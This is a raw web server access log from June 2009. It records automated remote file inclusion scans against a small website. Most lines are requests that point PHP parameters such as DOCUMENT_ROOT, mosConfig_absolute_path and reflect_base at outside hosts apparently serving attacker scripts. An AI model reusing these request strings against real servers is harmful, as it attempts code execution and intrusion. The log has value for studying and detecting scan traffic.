66.11.230.36 - - [29/Jun/2009:15:21:28 -0700] "GET /logs/access_090309.log/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
66.11.230.36 - - [29/Jun/2009:15:21:29 -0700] "GET /logs/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
66.197.183.21 - - [29/Jun/2009:15:22:56 -0700] "GET /logs/access_090427.log/?sourcedir=http://www.eyepro.net//assets/images/tanii?????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.toulouseangloexchange.com"
66.197.183.21 - - [29/Jun/2009:15:22:56 -0700] "GET /logs/?sourcedir=http://www.eyepro.net//assets/images/tanii?????????????? HTTP/1.1" 200 3083 "-" "libwww-perl/5.826" "www.toulouseangloexchange.com"
218.150.78.245 - - [29/Jun/2009:15:25:06 -0700] "GET /logs/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.150.78.245 - - [29/Jun/2009:15:25:06 -0700] "GET /logs/access_090309.log/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.150.78.245 - - [29/Jun/2009:15:25:07 -0700] "GET /reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.150.78.245 - - [29/Jun/2009:15:25:27 -0700] "GET /logs/access_090309.log/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.150.78.245 - - [29/Jun/2009:15:25:28 -0700] "GET /reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.150.78.245 - - [29/Jun/2009:15:25:28 -0700] "GET /logs/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
163.20.160.14 - - [29/Jun/2009:15:26:07 -0700] "GET /reflect/snippet.reflect.php?reflect_base=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
163.20.160.14 - - [29/Jun/2009:15:26:07 -0700] "GET /logs/reflect/snippet.reflect.php?reflect_base=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
163.20.160.14 - - [29/Jun/2009:15:26:07 -0700] "GET /logs/access_090309.log/reflect/snippet.reflect.php?reflect_base=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
163.20.160.14 - - [29/Jun/2009:15:33:37 -0700] "GET /logs/access_090309.log%20%20/reflect/snippet.reflect.php?reflect_base=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
210.220.213.203 - - [29/Jun/2009:15:40:06 -0700] "GET /logs/access_090420.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
208.47.92.61 - - [29/Jun/2009:15:45:05 -0700] "GET /logs/access_090302.log//index.php?DOCUMENT_ROOT=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.47.92.61 - - [29/Jun/2009:15:45:05 -0700] "GET /index.php?DOCUMENT_ROOT=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.47.92.61 - - [29/Jun/2009:15:45:06 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:15:49:18 -0700] "GET /logs/access_090302.log//index.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:15:49:18 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:15:49:18 -0700] "GET /index.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
91.121.112.152 - - [29/Jun/2009:15:56:47 -0700] "GET /index.php?DOCUMENT_ROOT=http://colegiopenacorada.com/xoops_lib/modules/v5id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
91.121.112.152 - - [29/Jun/2009:15:56:47 -0700] "GET /logs/access_090302.log//index.php?DOCUMENT_ROOT=http://colegiopenacorada.com/xoops_lib/modules/v5id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
91.121.112.152 - - [29/Jun/2009:15:56:47 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://colegiopenacorada.com/xoops_lib/modules/v5id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
121.165.73.157 - - [29/Jun/2009:16:05:55 -0700] "GET /logs/access_090504.log//bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
121.165.73.157 - - [29/Jun/2009:16:05:56 -0700] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
121.165.73.157 - - [29/Jun/2009:16:05:57 -0700] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
121.165.73.157 - - [29/Jun/2009:16:06:22 -0700] "GET /logs/access_090504.log//bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
121.165.73.157 - - [29/Jun/2009:16:06:23 -0700] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
121.165.73.157 - - [29/Jun/2009:16:06:24 -0700] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
121.165.73.157 - - [29/Jun/2009:16:09:55 -0700] "GET /logs/access_090511.log//bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:16:10:33 -0700] "GET /logs/index.php?abg_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:16:10:33 -0700] "GET /logs/access_081109.log%20%20/index.php?abg_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:16:10:33 -0700] "GET /index.php?abg_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
121.165.73.157 - - [29/Jun/2009:16:10:49 -0700] "GET /logs/access_090511.log//bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:16:10:59 -0700] "GET /logs/access_090511.log%20%20/index.php?abg_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
121.165.73.157 - - [29/Jun/2009:16:13:07 -0700] "GET /logs/access_090504.log//bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
121.165.73.157 - - [29/Jun/2009:16:13:08 -0700] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
121.165.73.157 - - [29/Jun/2009:16:13:08 -0700] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
121.165.73.157 - - [29/Jun/2009:16:17:23 -0700] "GET /logs/access_090511.log//bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.249.108.180 - - [29/Jun/2009:16:45:59 -0700] "GET /logs/access.log//includes/ktedit/toolbar.php?dirDepth=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
72.249.108.180 - - [29/Jun/2009:16:45:59 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
72.249.108.180 - - [29/Jun/2009:16:46:00 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
80.93.48.103 - - [29/Jun/2009:16:50:00 -0700] "GET /logs/access.log//includes/ktedit/toolbar.php?dirDepth=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.48.103 - - [29/Jun/2009:16:50:00 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.48.103 - - [29/Jun/2009:16:50:01 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
211.115.206.114 - - [29/Jun/2009:16:59:20 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
211.115.206.114 - - [29/Jun/2009:16:59:21 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
211.115.206.114 - - [29/Jun/2009:16:59:26 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
211.115.206.114 - - [29/Jun/2009:16:59:32 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
211.115.206.114 - - [29/Jun/2009:16:59:32 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
211.115.206.114 - - [29/Jun/2009:16:59:32 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
72.249.108.180 - - [29/Jun/2009:17:11:01 -0700] "GET /logs/access_090420.log/main.php?_zb_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
72.249.108.180 - - [29/Jun/2009:17:11:01 -0700] "GET /main.php?_zb_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
72.249.108.180 - - [29/Jun/2009:17:11:02 -0700] "GET /logs/main.php?_zb_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
195.225.104.106 - - [29/Jun/2009:17:11:43 -0700] "GET /logs/home.php?pagina=http://www.m3h4x0r.xpg.com.br/Convidados/abhieid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
195.225.104.106 - - [29/Jun/2009:17:11:43 -0700] "GET /home.php?pagina=http://www.m3h4x0r.xpg.com.br/Convidados/abhieid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
195.225.104.106 - - [29/Jun/2009:17:11:44 -0700] "GET /logs/access_090412.log/home.php?pagina=http://www.m3h4x0r.xpg.com.br/Convidados/abhieid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
195.225.104.106 - - [29/Jun/2009:17:12:49 -0700] "GET /logs/access_090412.log%20/home.php?pagina=http://www.m3h4x0r.xpg.com.br/Convidados/abhieid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.25.147.102 - - [29/Jun/2009:17:14:09 -0700] "GET /logs/access_090412.log/home.php?pagina=http://www.m3h4x0r.xpg.com.br/Convidados/abhieid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.toulouseangloexchange.com"
85.25.147.102 - - [29/Jun/2009:17:14:09 -0700] "GET /logs/home.php?pagina=http://www.m3h4x0r.xpg.com.br/Convidados/abhieid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.toulouseangloexchange.com"
85.25.147.102 - - [29/Jun/2009:17:14:09 -0700] "GET /home.php?pagina=http://www.m3h4x0r.xpg.com.br/Convidados/abhieid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.toulouseangloexchange.com"
85.25.147.102 - - [29/Jun/2009:17:15:12 -0700] "GET /logs/access_090412.log%20/home.php?pagina=http://www.m3h4x0r.xpg.com.br/Convidados/abhieid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.toulouseangloexchange.com"
72.249.108.180 - - [29/Jun/2009:17:41:32 -0700] "GET /logs/access_090302.log/main.php?_zb_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
85.25.147.102 - - [29/Jun/2009:17:49:39 -0700] "GET /logs/main.php?x=http://www.m3h4x0r.xpg.com.br/Convidados/abhieid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.toulouseangloexchange.com"
85.25.147.102 - - [29/Jun/2009:17:49:39 -0700] "GET /logs/access.log/main.php?x=http://www.m3h4x0r.xpg.com.br/Convidados/abhieid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.toulouseangloexchange.com"
85.25.147.102 - - [29/Jun/2009:17:49:39 -0700] "GET /main.php?x=http://www.m3h4x0r.xpg.com.br/Convidados/abhieid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.toulouseangloexchange.com"
174.133.150.130 - - [29/Jun/2009:17:50:22 -0700] "GET /logs/access_090420.log//bbs/include/write.php?dir=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.toulouseangloexchange.com"
174.133.150.130 - - [29/Jun/2009:17:50:22 -0700] "GET /bbs/include/write.php?dir=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.toulouseangloexchange.com"
174.133.150.130 - - [29/Jun/2009:17:50:22 -0700] "GET /logs//bbs/include/write.php?dir=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.toulouseangloexchange.com"
174.133.150.130 - - [29/Jun/2009:17:50:28 -0700] "GET /logs/access_090420.log//bbs/include/write.php?dir=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.toulouseangloexchange.com"
174.133.150.130 - - [29/Jun/2009:17:50:28 -0700] "GET /bbs/include/write.php?dir=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.toulouseangloexchange.com"
174.133.150.130 - - [29/Jun/2009:17:50:28 -0700] "GET /logs//bbs/include/write.php?dir=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.toulouseangloexchange.com"
207.58.132.65 - - [29/Jun/2009:17:51:18 -0700] "GET /trans.php?trans=http://haxl33t.land.ru/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
207.58.132.65 - - [29/Jun/2009:17:51:18 -0700] "GET /logs/access_090413.log%20%20/trans.php?trans=http://haxl33t.land.ru/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
207.58.132.65 - - [29/Jun/2009:17:51:18 -0700] "GET /logs/trans.php?trans=http://haxl33t.land.ru/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
207.58.132.65 - - [29/Jun/2009:17:51:37 -0700] "GET /logs/access_090323.log%20%20/trans.php?trans=http://haxl33t.land.ru/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
85.25.147.102 - - [29/Jun/2009:17:58:56 -0700] "GET /logs/access_090427.log/main.php?x=http://www.m3h4x0r.xpg.com.br/Convidados/abhieid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:18:07:23 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:18:07:23 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:18:07:23 -0700] "GET /logs/access_081109.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:18:07:42 -0700] "GET /logs/access_090316.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
86.109.109.87 - - [29/Jun/2009:18:15:39 -0700] "GET /logs/access_090420.log//config/dbutil.bck.php?confdir=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
86.109.109.87 - - [29/Jun/2009:18:15:40 -0700] "GET /config/dbutil.bck.php?confdir=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
86.109.109.87 - - [29/Jun/2009:18:15:40 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
195.225.104.106 - - [29/Jun/2009:18:25:19 -0700] "GET /logs/access.log/main.php?x=http://www.m3h4x0r.xpg.com.br/Convidados/abhieid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
195.225.104.106 - - [29/Jun/2009:18:25:19 -0700] "GET /main.php?x=http://www.m3h4x0r.xpg.com.br/Convidados/abhieid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
195.225.104.106 - - [29/Jun/2009:18:25:19 -0700] "GET /logs/main.php?x=http://www.m3h4x0r.xpg.com.br/Convidados/abhieid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
195.225.104.106 - - [29/Jun/2009:18:26:05 -0700] "GET /logs/access_090427.log/main.php?x=http://www.m3h4x0r.xpg.com.br/Convidados/abhieid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
122.162.53.65 - - [29/Jun/2009:18:26:58 -0700] "GET /logs/trans.php?trans=http://haxl33t.land.ru/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
122.162.53.65 - - [29/Jun/2009:18:26:58 -0700] "GET /trans.php?trans=http://haxl33t.land.ru/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
122.162.53.65 - - [29/Jun/2009:18:27:02 -0700] "GET /logs/access_090413.log%20%20/trans.php?trans=http://haxl33t.land.ru/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
86.109.109.87 - - [29/Jun/2009:18:27:13 -0700] "GET /logs/access_090105.log//config/dbutil.bck.php?confdir=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
122.162.53.65 - - [29/Jun/2009:18:27:17 -0700] "GET /logs/access_090323.log%20%20/trans.php?trans=http://haxl33t.land.ru/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
190.144.44.36 - - [29/Jun/2009:18:35:44 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
190.144.44.36 - - [29/Jun/2009:18:35:44 -0700] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
190.144.44.36 - - [29/Jun/2009:18:35:44 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
190.144.44.36 - - [29/Jun/2009:18:35:53 -0700] "GET /logs/access_090420.log%20%20//include/admin.lib.inc.php?site_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
190.144.44.36 - - [29/Jun/2009:18:36:11 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
190.144.44.36 - - [29/Jun/2009:18:36:12 -0700] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
190.144.44.36 - - [29/Jun/2009:18:36:12 -0700] "GET /logs/access_090420.log%20%20//include/admin.lib.inc.php?site_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
190.144.44.36 - - [29/Jun/2009:18:36:14 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
195.225.104.106 - - [29/Jun/2009:18:41:27 -0700] "GET /logs/access_090323.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.m3h4x0r.xpg.com.br/Convidados/abhieid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
195.225.104.106 - - [29/Jun/2009:18:41:27 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.m3h4x0r.xpg.com.br/Convidados/abhieid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
195.225.104.106 - - [29/Jun/2009:18:41:27 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.m3h4x0r.xpg.com.br/Convidados/abhieid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
89.108.83.240 - - [29/Jun/2009:18:44:00 -0700] "GET /logs/access_090420.log/errors.php?error=http://www.atu.bz/pzy.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.toulouseangloexchange.com"
89.108.83.240 - - [29/Jun/2009:18:44:00 -0700] "GET /errors.php?error=http://www.atu.bz/pzy.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.toulouseangloexchange.com"
89.108.83.240 - - [29/Jun/2009:18:44:00 -0700] "GET /logs/errors.php?error=http://www.atu.bz/pzy.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.toulouseangloexchange.com"
89.108.83.240 - - [29/Jun/2009:18:44:08 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
89.108.83.240 - - [29/Jun/2009:18:44:08 -0700] "GET /logs/access_090323.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
89.108.83.240 - - [29/Jun/2009:18:44:08 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
85.25.147.102 - - [29/Jun/2009:18:44:53 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.m3h4x0r.xpg.com.br/Convidados/abhieid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.toulouseangloexchange.com"
85.25.147.102 - - [29/Jun/2009:18:44:54 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.m3h4x0r.xpg.com.br/Convidados/abhieid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.toulouseangloexchange.com"
85.25.147.102 - - [29/Jun/2009:18:44:54 -0700] "GET /logs/access_090323.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.m3h4x0r.xpg.com.br/Convidados/abhieid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.toulouseangloexchange.com"
89.108.83.240 - - [29/Jun/2009:18:50:39 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.atu.bz/pzy.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.toulouseangloexchange.com"
89.108.83.240 - - [29/Jun/2009:18:50:39 -0700] "GET //vwar/backup/errors.php?error=http://www.atu.bz/pzy.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.toulouseangloexchange.com"
89.108.83.240 - - [29/Jun/2009:18:50:39 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.atu.bz/pzy.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.toulouseangloexchange.com"
86.109.109.87 - - [29/Jun/2009:18:51:51 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
86.109.109.87 - - [29/Jun/2009:18:51:51 -0700] "GET /logs/access_090323.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
